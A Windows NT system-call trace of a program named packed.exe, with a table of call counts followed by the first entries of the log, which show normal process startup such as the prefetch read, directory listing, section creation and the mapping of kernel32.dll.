Summary:

NtAddAtom(>) 1 NtFsControlFile(>) 2 NtReadVirtualMemory(>) 5 NtCreateEvent(>) 23
NtCallbackReturn(>) 1 NtGdiCreateSolidBrush(>) 2 NtSetValueKey(>) 5 NtQueryInformationFile(>) 25
NtConnectPort(>) 1 NtOpenDirectoryObject(>) 2 NtWriteFile(>) 5 NtOpenProcessTokenEx(>) 29
NtCreateMutant(>) 1 NtOpenEvent(>) 2 NtOpenThreadToken(>) 7 NtOpenThreadTokenEx(>) 29
NtDelayExecution(>) 1 NtOpenProcess(>) 2 NtSetEvent(>) 7 NtCreateFile(>) 33
NtEnumerateValueKey(>) 1 NtQueryInformationJobObject(>) 2 NtOpenMutant(>) 8 NtQueryDirectoryFile(>) 33
NtGdiCreateBitmap(>) 1 NtQueryPerformanceCounter(>) 2 NtWriteVirtualMemory(>) 8 NtFreeVirtualMemory(>) 36
NtGdiInit(>) 1 NtRegisterThreadTerminatePort(>) 2 NtCreateKey(>) 9 NtQueryInformationToken(>) 37
NtGdiQueryFontAssocInfo(>) 1 NtSetEventBoostPriority(>) 2 NtOpenProcessToken(>) 9 NtQueryInformationProcess(>) 38
NtGdiSelectBitmap(>) 1 NtTestAlert(>) 2 NtQueryDefaultUILanguage(>) 10 NtOpenSection(>) 39
NtOpenKeyedEvent(>) 1 NtUserQueryWindow(>) 2 NtCreateSemaphore(>) 11 NtQuerySystemInformation(>) 43
NtQueryEvent(>) 1 NtClearEvent(>) 3 NtSetInformationThread(>) 11 NtUserGetAtomName(>) 47
NtQueryInformationThread(>) 1 NtCreateThread(>) 3 NtUserSystemParametersInfo(>) 11 NtUserUnregisterClass(>) 47
NtQueryInstallUILanguage(>) 1 NtDuplicateObject(>) 3 NtEnumerateKey(>) 12 NtUserFindExistingCursorIcon(>) 50
NtQueryKey(>) 1 NtGdiCreateCompatibleDC(>) 3 NtQueryVolumeInformationFile(>) 12 NtMapViewOfSection(>) 58
NtQueryObject(>) 1 NtNotifyChangeKey(>) 3 NtReleaseMutant(>) 12 NtUserRegisterClassExWOW(>) 61
NtQueryTimerResolution(>) 1 NtOpenSymbolicLinkObject(>) 3 NtRequestWaitReplyPort(>) 13 NtQueryVirtualMemory(>) 64
NtRaiseException(>) 1 NtQuerySymbolicLinkObject(>) 3 NtQuerySection(>) 17 NtOpenFile(>) 67
NtReadFile(>) 1 NtReleaseSemaphore(>) 3 NtDeviceIoControlFile(>) 18 NtCreateSection(>) 83
NtSecureConnectPort(>) 1 NtResumeThread(>) 3 NtQueryDebugFilterState(>) 18 NtQueryAttributesFile(>) 86
NtUserCallNoParam(>) 1 NtSetInformationObject(>) 3 NtUnmapViewOfSection(>) 18 NtAllocateVirtualMemory(>) 144
NtUserCallOneParam(>) 1 NtTerminateProcess(>) 3 NtQueryDefaultLocale(>) 19 NtFlushInstructionCache(>) 162
NtUserGetDC(>) 1 NtWaitForMultipleObjects(>) 3 NtSetInformationFile(>) 19 NtOpenKey(>) 305
NtUserGetThreadDesktop(>) 1 NtAccessCheck(>) 5 NtSetInformationProcess(>) 20 NtQueryValueKey(>) 426
NtCreateProcessEx(>) 2 NtContinue(>) 5 NtUserRegisterWindowMessage(>) 20 NtClose(>) 461
NtDuplicateToken(>) 2 NtGdiGetStockObject(>) 5 NtWaitForSingleObject(>) 22 NtProtectVirtualMemory(>) 1061

Trace:

00001 896 NtOpenFile (0x80100000, {24, 0, 0x240, 0, 0, (0x80100000, {24, 0, 0x240, 0, 0, "\SystemRoot\Prefetch\PACKED.EXE-09ED06A1.pf"}, 0, 32, ... -2147481368, {status=0x0, info=1}, ) }, 0, 32, ... -2147481368, {status=0x0, info=1}, ) == 0x0 00002 896 NtQueryInformationFile (-2147481368, -142414796, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 00003 896 NtReadFile (-2147481368, 0, 0, 0, 13474, 0x0, 0, ... {status=0x0, info=13474}, (-2147481368, 0, 0, 0, 13474, 0x0, 0, ... {status=0x0, info=13474}, "\21\0\0\0SCCA\17\0\0\0\2424\0\0P\0A\0C\0K\0E\0D\0.\0E\0X\0E\0\0\0\0\00\366i\201\0\0\0\0\0\0\0\0\20\0\0\0@-\201\367\0@\300\367\30,\201\367x@s\201@-\201\367\241\6\355\11\0\0\0\0\230\0\0\0\34\0\0\0\310\2\0\0\331\2\0\0\364$\0\0\36\14\0\0\301\0\0\1\0\0\0\212\3\0\0\200\14V6\217\260\310\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0\0\0\01\0\0\0\0\0\0\02\0\0\0\2\0\0\01\0\0\0%\1\0\0f\0\0\05\0\0\0\6\0\0\0V\1\0\0\5\0\0\0\322\0\0\04\0\0\0\4\0\0\0[\1\0\0\3\0\0\0<\1\0\03\0\0\0\4\0\0\0^\1\0\0\4\0\0\0\244\1\0\05\0\0\0\4\0\0\0b\1\0\0\32\0\0\0\20\2\0\03\0\0\0\2\0\0\0|\1\0\0\23\0\0\0x\2\0\02\0\0\0\2\0\0\0\217\1\0\0\7\0\0\0\336\2\0\02\0\0\0\6\0\0\0\226\1\0\0\22\0\0\0D\3\0\05\0\0\0\2\0\0\0\250\1\0\0\14\0\0\0\260\3\0\03\0\0\0\2\0\0\0\264\1\0\0\13\0\0\0\30\4\0\05\0\0\0\2\0\0\0\277\1\0\0*\0\0\0\204\4\0\03\0\0\0\2\0\0\0\351\1\0\0\21\0\0\0\354\4\0\02\0\0\0\2\0\0\0\372\1\0\0\2\0\0\0R\5\0\02\0\0\0\4\0\0\0\374\1\0\0\1\0\0\0\270\5\0\04\0\0\0\4\0\0\0\375\1\0\0\22\0\0\0"\6\0\04\0\0\0\6\0\0\0\17\2\0\0\36\0\0\0\214\6\0\04\0\0\0\2\0\0\0-\2\0\0\13\0\0\0", ) \6\0\04\0\0\0\6\0\0\0\17\2\0\0\36\0\0\0\214\6\0\04\0\0\0\2\0\0\0-\2\0\0\13\0\0\0", ) == 0x0 00004 896 NtClose (-2147481368, ... ) == 0x0 00005 896 NtCreateFile (0x100080, {24, 0, 0x240, 0, 0, (0x100080, {24, 0, 0x240, 0, 0, "\DEVICE\HARDDISKVOLUME1"}, 0x0, 0, 7, 1, 32, 0, 0, ... -2147481368, {status=0x0, info=0}, ) }, 0x0, 0, 7, 1, 32, 0, 0, ... -2147481368, {status=0x0, info=0}, ) == 0x0 00006 896 NtQueryVolumeInformationFile (-2147481368, -142414840, 8, Device, ... {status=0x0, info=8}, ) == 0x0 00007 896 NtClose (-2147481368, ... ) == 0x0 00008 896 NtCreateFile (0x100180, {24, 0, 0x240, 0, 0, (0x100180, {24, 0, 0x240, 0, 0, "\DEVICE\HARDDISKVOLUME1"}, 0x0, 0, 7, 1, 32, 0, 0, ... }, 0x0, 0, 7, 1, 32, 0, 0, ... 00009 896 NtContinue (-142419640, 0, ... 00008 896 NtCreateFile ... -2147481368, {status=0x0, info=1}, ) == 0x0 00010 896 NtQueryVolumeInformationFile (-2147481368, -142414852, 24, Volume, ... {status=0x0, info=18}, ) == 0x0 00011 896 NtFsControlFile (-2147481368, 0, 0x0, 0x0, 0x90120, (-2147481368, 0, 0x0, 0x0, 0x90120, "\1\0\0\0!\0\0\0H\10\0\0\0\0\1\0\2309\0\0\0\0\2\0\15\1\0\0\0\0\1\0\357\0\0\0\0\3\0X\244\0\0\0\0\4\0\217\10\0\0\0\0\1\0\214;\0\0\0\0\2\0XK\0\0\0\0\3\0f\10\0\0\0\0\1\0Z\10\0\0\0\0\1\0\304\10\0\0\0\0\1\0Y\10\0\0\0\0\1\0C\10\0\0\0\0\1\0/:\0\0\0\0\3\0\235\244\0\0\0\0\3\0\26\11\0\0\0\0\1\0\201\246\0\0\0\0\3\0\224\246\0\0\0\0\3\0@C\0\0\0\0\2\0r\10\0\0\0\0\1\0g\10\0\0\0\0\1\0\2\1\0\0\0\0\1\0o%\0\0\0\0\3\0\243\10\0\0\0\0\1\0q\10\0\0\0\0\1\0p\10\0\0\0\0\1\0@\31\0\0\0\0\1\0\2339\0\0\0\0\1\0\5\0\0\0\0\0\5\0\34\0\0\0\0\0\1\0'\0\0\0\0\0\1\0\210\0\0\0\0\0\1\0\2329\0\0\0\0\1\0", 272, 0, ... {status=0x0, info=0}, 0x0, ) , 272, 0, ... {status=0x0, info=0}, 0x0, ) == 0x0 00012 896 NtCreateFile (0x100001, {24, 0, 0x240, 0, 0, (0x100001, {24, 0, 0x240, 0, 0, "\DEVICE\HARDDISKVOLUME1\"}, 0x0, 0, 7, 1, 16417, 0, 0, ... -2147482652, {status=0x0, info=1}, ) }, 0x0, 0, 7, 1, 16417, 0, 0, ... -2147482652, {status=0x0, info=1}, ) == 0x0 00013 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446847, ... {status=0x0, info=1146}, ) == 0x0 00014 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446848, ... ) == STATUS_NO_MORE_FILES 00015 896 NtClose (-2147482652, ... ) == 0x0 00016 896 NtCreateFile (0x100001, {24, 0, 0x240, 0, 0, (0x100001, {24, 0, 0x240, 0, 0, "\DEVICE\HARDDISKVOLUME1\WINDOWS\"}, 0x0, 0, 7, 1, 16417, 0, 0, ... -2147482652, {status=0x0, info=1}, ) }, 0x0, 0, 7, 1, 16417, 0, 0, ... -2147482652, {status=0x0, info=1}, ) == 0x0 00017 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446847, ... {status=0x0, info=15820}, ) == 0x0 00018 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446848, ... ) == STATUS_NO_MORE_FILES 00019 896 NtClose (-2147482652, ... ) == 0x0 00020 896 NtCreateFile (0x100001, {24, 0, 0x240, 0, 0, (0x100001, {24, 0, 0x240, 0, 0, "\DEVICE\HARDDISKVOLUME1\WINDOWS\SYSTEM32\"}, 0x0, 0, 7, 1, 16417, 0, 0, ... -2147482652, {status=0x0, info=1}, ) }, 0x0, 0, 7, 1, 16417, 0, 0, ... -2147482652, {status=0x0, info=1}, ) == 0x0 00021 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446847, ... {status=0x0, info=16366}, ) == 0x0 00022 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446848, ... {status=0x0, info=16354}, ) == 0x0 00023 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446848, ... {status=0x0, info=16348}, ) == 0x0 00024 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446848, ... {status=0x0, info=16364}, ) == 0x0 00025 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446848, ... {status=0x0, info=11386}, ) == 0x0 00026 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446848, ... ) == STATUS_NO_MORE_FILES 00027 896 NtClose (-2147482652, ... ) == 0x0 00028 896 NtCreateFile (0x100001, {24, 0, 0x240, 0, 0, (0x100001, {24, 0, 0x240, 0, 0, "\DEVICE\HARDDISKVOLUME1\WINDOWS\WINSXS\"}, 0x0, 0, 7, 1, 16417, 0, 0, ... -2147482652, {status=0x0, info=1}, ) }, 0x0, 0, 7, 1, 16417, 0, 0, ... -2147482652, {status=0x0, info=1}, ) == 0x0 00029 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446847, ... {status=0x0, info=2228}, ) == 0x0 00030 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446848, ... ) == STATUS_NO_MORE_FILES 00031 896 NtClose (-2147482652, ... ) == 0x0 00032 896 NtCreateFile (0x100001, {24, 0, 0x240, 0, 0, (0x100001, {24, 0, 0x240, 0, 0, "\DEVICE\HARDDISKVOLUME1\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.2600.2982_X-WW_AC3F9C03\"}, 0x0, 0, 7, 1, 16417, 0, 0, ... -2147482652, {status=0x0, info=1}, ) }, 0x0, 0, 7, 1, 16417, 0, 0, ... -2147482652, {status=0x0, info=1}, ) == 0x0 00033 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446847, ... {status=0x0, info=68}, ) == 0x0 00034 896 NtQueryDirectoryFile (-2147482652, 0, 0, 0, -504332288, 16384, Names, 0, 0x0, -518446848, ... ) == STATUS_NO_MORE_FILES 00035 896 NtClose (-2147482652, ... ) == 0x0 00036 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482652, ... -2147482724, ) == 0x0 00037 896 NtClose (-2147482724, ... ) == 0x0 00038 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482724, ... -2147482656, ) == 0x0 00039 896 NtClose (-2147482656, ... ) == 0x0 00040 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482656, ... -2147482660, ) == 0x0 00041 896 NtClose (-2147482660, ... ) == 0x0 00042 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482660, ... -2147482688, ) == 0x0 00043 896 NtClose (-2147482688, ... ) == 0x0 00044 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482688, ... -2147482764, ) == 0x0 00045 896 NtClose (-2147482764, ... ) == 0x0 00046 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482764, ... -2147481452, ) == 0x0 00047 896 NtClose (-2147481452, ... ) == 0x0 00048 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147481452, ... -2147482684, ) == 0x0 00049 896 NtClose (-2147482684, ... ) == 0x0 00050 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482684, ... -2147482680, ) == 0x0 00051 896 NtClose (-2147482680, ... ) == 0x0 00052 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482680, ... -2147482760, ) == 0x0 00053 896 NtClose (-2147482760, ... ) == 0x0 00054 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482760, ... -2147481628, ) == 0x0 00055 896 NtClose (-2147481628, ... ) == 0x0 00056 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147481628, ... -2147481484, ) == 0x0 00057 896 NtClose (-2147481484, ... ) == 0x0 00058 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147481484, ... -2147481480, ) == 0x0 00059 896 NtClose (-2147481480, ... ) == 0x0 00060 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147481480, ... -2147482136, ) == 0x0 00061 896 NtClose (-2147482136, ... ) == 0x0 00062 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482136, ... -2147482748, ) == 0x0 00063 896 NtClose (-2147482748, ... ) == 0x0 00064 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482748, ... -2147482676, ) == 0x0 00065 896 NtClose (-2147482676, ... ) == 0x0 00066 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482676, ... -2147482672, ) == 0x0 00067 896 NtClose (-2147482672, ... ) == 0x0 00068 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482672, ... -2147482668, ) == 0x0 00069 896 NtClose (-2147482668, ... ) == 0x0 00070 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482668, ... -2147482664, ) == 0x0 00071 896 NtClose (-2147482664, ... ) == 0x0 00072 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482664, ... -2147481588, ) == 0x0 00073 896 NtClose (-2147481588, ... ) == 0x0 00074 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147481588, ... -2147481584, ) == 0x0 00075 896 NtClose (-2147481584, ... ) == 0x0 00076 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147481584, ... -2147482692, ) == 0x0 00077 896 NtClose (-2147482692, ... ) == 0x0 00078 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482692, ... -2147481512, ) == 0x0 00079 896 NtClose (-2147481512, ... ) == 0x0 00080 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147481512, ... -2147481580, ) == 0x0 00081 896 NtClose (-2147481580, ... ) == 0x0 00082 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147481580, ... -2147481552, ) == 0x0 00083 896 NtClose (-2147481552, ... ) == 0x0 00084 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147481552, ... -2147481592, ) == 0x0 00085 896 NtClose (-2147481592, ... ) == 0x0 00086 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147481592, ... -2147481596, ) == 0x0 00087 896 NtClose (-2147481596, ... ) == 0x0 00088 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147481596, ... -2147482108, ) == 0x0 00089 896 NtClose (-2147482108, ... ) == 0x0 00090 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 4, 67108864, -2147482108, ... -2147482732, ) == 0x0 00091 896 NtClose (-2147482732, ... ) == 0x0 00092 896 NtClose (-2147482652, ... ) == 0x0 00093 896 NtClose (-2147482724, ... ) == 0x0 00094 896 NtClose (-2147482656, ... ) == 0x0 00095 896 NtClose (-2147482660, ... ) == 0x0 00096 896 NtClose (-2147482688, ... ) == 0x0 00097 896 NtClose (-2147482764, ... ) == 0x0 00098 896 NtClose (-2147481452, ... ) == 0x0 00099 896 NtClose (-2147482684, ... ) == 0x0 00100 896 NtClose (-2147482680, ... ) == 0x0 00101 896 NtClose (-2147482760, ... ) == 0x0 00102 896 NtClose (-2147481628, ... ) == 0x0 00103 896 NtClose (-2147481484, ... ) == 0x0 00104 896 NtClose (-2147481480, ... ) == 0x0 00105 896 NtClose (-2147482136, ... ) == 0x0 00106 896 NtClose (-2147482748, ... ) == 0x0 00107 896 NtClose (-2147482676, ... ) == 0x0 00108 896 NtClose (-2147482672, ... ) == 0x0 00109 896 NtClose (-2147482668, ... ) == 0x0 00110 896 NtClose (-2147482664, ... ) == 0x0 00111 896 NtClose (-2147481588, ... ) == 0x0 00112 896 NtClose (-2147481584, ... ) == 0x0 00113 896 NtClose (-2147482692, ... ) == 0x0 00114 896 NtClose (-2147481512, ... ) == 0x0 00115 896 NtClose (-2147481580, ... ) == 0x0 00116 896 NtClose (-2147481552, ... ) == 0x0 00117 896 NtClose (-2147481592, ... ) == 0x0 00118 896 NtClose (-2147481596, ... ) == 0x0 00119 896 NtClose (-2147482108, ... ) == 0x0 00120 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147482108, ... -2147481596, ) == 0x0 00121 896 NtClose (-2147481596, ... ) == 0x0 00122 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147481596, ... -2147481592, ) == 0x0 00123 896 NtClose (-2147481592, ... ) == 0x0 00124 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147481592, ... -2147481552, ) == 0x0 00125 896 NtClose (-2147481552, ... ) == 0x0 00126 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147481552, ... -2147481580, ) == 0x0 00127 896 NtClose (-2147481580, ... ) == 0x0 00128 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147481580, ... -2147481512, ) == 0x0 00129 896 NtClose (-2147481512, ... ) == 0x0 00130 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147481512, ... -2147482692, ) == 0x0 00131 896 NtClose (-2147482692, ... ) == 0x0 00132 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147482692, ... -2147481584, ) == 0x0 00133 896 NtClose (-2147481584, ... ) == 0x0 00134 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147481584, ... -2147481588, ) == 0x0 00135 896 NtClose (-2147481588, ... ) == 0x0 00136 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147481588, ... -2147482664, ) == 0x0 00137 896 NtClose (-2147482664, ... ) == 0x0 00138 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147482664, ... -2147482668, ) == 0x0 00139 896 NtClose (-2147482668, ... ) == 0x0 00140 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147482668, ... -2147482672, ) == 0x0 00141 896 NtClose (-2147482672, ... ) == 0x0 00142 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147482672, ... -2147482676, ) == 0x0 00143 896 NtClose (-2147482676, ... ) == 0x0 00144 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147482676, ... -2147482748, ) == 0x0 00145 896 NtClose (-2147482748, ... ) == 0x0 00146 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147482748, ... -2147482136, ) == 0x0 00147 896 NtClose (-2147482136, ... ) == 0x0 00148 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147482136, ... -2147481480, ) == 0x0 00149 896 NtClose (-2147481480, ... ) == 0x0 00150 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147481480, ... -2147481484, ) == 0x0 00151 896 NtClose (-2147481484, ... ) == 0x0 00152 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147481484, ... -2147481628, ) == 0x0 00153 896 NtClose (-2147481628, ... ) == 0x0 00154 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147481628, ... -2147482760, ) == 0x0 00155 896 NtClose (-2147482760, ... ) == 0x0 00156 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147482760, ... -2147482680, ) == 0x0 00157 896 NtClose (-2147482680, ... ) == 0x0 00158 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147482680, ... -2147482684, ) == 0x0 00159 896 NtClose (-2147482684, ... ) == 0x0 00160 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147482684, ... -2147481452, ) == 0x0 00161 896 NtClose (-2147481452, ... ) == 0x0 00162 896 NtCreateSection (0xd, {24, 0, 0x240, 0, 0, 0x0}, 0x0, 16, 16777216, -2147481452, ... -2147482764, ) == 0x0 00163 896 NtClose (-2147482764, ... ) == 0x0 00164 896 NtClose (-2147482108, ... ) == 0x0 00165 896 NtClose (-2147481596, ... ) == 0x0 00166 896 NtClose (-2147481592, ... ) == 0x0 00167 896 NtClose (-2147481552, ... ) == 0x0 00168 896 NtClose (-2147481580, ... ) == 0x0 00169 896 NtClose (-2147481512, ... ) == 0x0 00170 896 NtClose (-2147482692, ... ) == 0x0 00171 896 NtClose (-2147481584, ... ) == 0x0 00172 896 NtClose (-2147481588, ... ) == 0x0 00173 896 NtClose (-2147482664, ... ) == 0x0 00174 896 NtClose (-2147482668, ... ) == 0x0 00175 896 NtClose (-2147482672, ... ) == 0x0 00176 896 NtClose (-2147482676, ... ) == 0x0 00177 896 NtClose (-2147482748, ... ) == 0x0 00178 896 NtClose (-2147482136, ... ) == 0x0 00179 896 NtClose (-2147481480, ... ) == 0x0 00180 896 NtClose (-2147481484, ... ) == 0x0 00181 896 NtClose (-2147481628, ... ) == 0x0 00182 896 NtClose (-2147482760, ... ) == 0x0 00183 896 NtClose (-2147482680, ... ) == 0x0 00184 896 NtClose (-2147482684, ... ) == 0x0 00185 896 NtClose (-2147481452, ... ) == 0x0 00186 896 NtClose (-2147481368, ... ) == 0x0 00187 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\packed.exe"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00188 896 NtOpenKeyedEvent (0x2000000, {24, 0, 0x0, 0, 0, (0x2000000, {24, 0, 0x0, 0, 0, "\KernelObjects\CritSecOutOfMemoryEvent"}, ... 4, ) }, ... 4, ) == 0x0 00189 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00190 896 NtAllocateVirtualMemory (-1, 0, 0, 1048576, 8192, 4, ... 1310720, 1048576, ) == 0x0 00191 896 NtAllocateVirtualMemory (-1, 1310720, 0, 4096, 4096, 4, ... 1310720, 4096, ) == 0x0 00192 896 NtAllocateVirtualMemory (-1, 1314816, 0, 8192, 4096, 4, ... 1314816, 8192, ) == 0x0 00193 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00194 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 2359296, 65536, ) == 0x0 00195 896 NtAllocateVirtualMemory (-1, 2359296, 0, 24576, 4096, 4, ... 2359296, 24576, ) == 0x0 00196 896 NtOpenDirectoryObject (0x3, {24, 0, 0x40, 0, 0, (0x3, {24, 0, 0x40, 0, 0, "\KnownDlls"}, ... 8, ) }, ... 8, ) == 0x0 00197 896 NtOpenSymbolicLinkObject (0x1, {24, 8, 0x40, 0, 0, (0x1, {24, 8, 0x40, 0, 0, "KnownDllPath"}, ... 12, ) }, ... 12, ) == 0x0 00198 896 NtQuerySymbolicLinkObject (12, ... (12, ... "C:\WINDOWS\system32", 0x0, ) , 0x0, ) == 0x0 00199 896 NtClose (12, ... ) == 0x0 00200 896 NtOpenFile (0x100020, {24, 0, 0x42, 0, 0, (0x100020, {24, 0, 0x42, 0, 0, "\??\C:\scripts\"}, 3, 33, ... 12, {status=0x0, info=1}, ) }, 3, 33, ... 12, {status=0x0, info=1}, ) == 0x0 00201 896 NtQueryVolumeInformationFile (12, 1243852, 8, Device, ... {status=0x0, info=8}, ) == 0x0 00202 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe.Local"}, 1243804, ... ) }, 1243804, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00203 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "kernel32.dll"}, ... 16, ) }, ... 16, ) == 0x0 00204 896 NtMapViewOfSection (16, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x7c800000), 0x0, 1003520, ) == 0x0 00205 896 NtClose (16, ... ) == 0x0 00206 896 NtProtectVirtualMemory (-1, (0x7c801000), 1568, 4, ... (0x7c801000), 4096, 32, ) == 0x0 00207 896 NtProtectVirtualMemory (-1, (0x7c801000), 4096, 32, ... (0x7c801000), 4096, 4, ) == 0x0 00208 896 NtFlushInstructionCache (-1, 2088767488, 1568, ... ) == 0x0 00209 896 NtQueryInformationProcess (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0 00210 896 NtQuerySystemInformation (RangeStart, 4, ... {system info, class 50, size 4}, 0x0, ) == 0x0 00211 896 NtQuerySystemInformation (Basic, 44, ... 